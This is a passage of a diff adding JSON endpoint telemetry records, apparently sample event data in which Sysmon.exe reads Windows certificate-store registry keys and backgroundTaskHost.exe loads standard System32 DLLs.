"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "slc.dll", + "image_path": "C:\\Windows\\System32\\slc.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskExecutionCountSinceLastReset", + "registry_value": "TaskExecutionCountSinceLastReset", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 